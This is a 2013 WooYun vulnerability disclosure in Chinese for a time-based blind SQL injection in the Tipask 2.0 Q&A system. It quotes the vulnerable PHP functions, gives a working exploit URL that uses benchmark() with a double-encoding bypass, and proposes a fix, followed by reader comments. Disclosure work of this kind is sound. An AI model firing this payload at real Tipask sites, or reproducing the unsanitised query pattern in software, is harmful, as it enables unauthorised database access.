当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037201

漏洞标题:tipask问答系统2.0SQL时间盲注漏洞

相关厂商:tipask

漏洞作者: Kavia

提交时间:2013-09-15 12:35

修复时间:2013-10-30 12:35

公开时间:2013-10-30 12:35

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-10-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

其实我是来膜拜猪头子的

详细说明:

关于对get/post检测的部分,主要就是看猪头子大牛的:
WooYun: tipask问答系统2.0 ajaxsearch二次编码注入漏洞
/model/question.php

function ontag() {
$tag = urldecode($this->get['2']); //二次编码绕过
//echo $tag;
$encodeword = urlencode($tag);
$navtitle = $tag . '-标签搜索';
$qstatus = $status = intval($this->get[3]);
(!$status) && ($qstatus = "1,2,6");
$startindex = ($page - 1) * $pagesize;
$rownum = $this->db->fetch_total("question_tag", " tname='$tag' "); //带入查询


/lib/db.class.php
function fetch_total($table,$where='1') {
return $this->result_first("SELECT COUNT(*) num FROM ".DB_TABLEPRE."$table WHERE $where"); //带入查询
}

漏洞证明:

exp:http://host/tipask/?question/tag/+urlencode("' and (select if(1=1,benchmark(500000,sha(1)),0))>0#");

修复方案:

function ontag() {
$tag = $this->get['2'];

版权声明:转载请注明来源 Kavia@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2013-09-15 15:27 | Evi1m0 ( 路人 | Rank:8 漏洞数:2 | 邪红色信息安全组织)

    @猪头子

  2. 2013-09-15 15:27 | Evi1m0 ( 路人 | Rank:8 漏洞数:2 | 邪红色信息安全组织)

    @Evi1m0

  3. 2013-09-15 21:11 | 养乐多Ngan ( 普通白帽子 | Rank:652 漏洞数:72 | Hello,world.其实最大的漏洞,是人心。)

    快公开!

  4. 2013-09-16 00:56 | Kavia ( 实习白帽子 | Rank:50 漏洞数:10 )

    @养乐多Ngan 厂商不会认领,要等很久啊。。

  5. 2013-09-16 07:59 | 养乐多Ngan ( 普通白帽子 | Rank:652 漏洞数:72 | Hello,world.其实最大的漏洞,是人心。)

    @Kavia 是啊。诶。

  6. 2013-09-16 15:07 | 猪头子 ( 普通白帽子 | Rank:189 漏洞数:35 | 自信的看着队友rm -rf/tar挂服务器)

    等死你哈哈哈哈

  7. 2013-09-16 17:32 | Kavia ( 实习白帽子 | Rank:50 漏洞数:10 )

    @猪头子 等你到天荒,到地老

  8. 2013-09-16 17:50 | Evi1m0 ( 路人 | Rank:8 漏洞数:2 | 邪红色信息安全组织)

    @猪头子 惊现猪头子!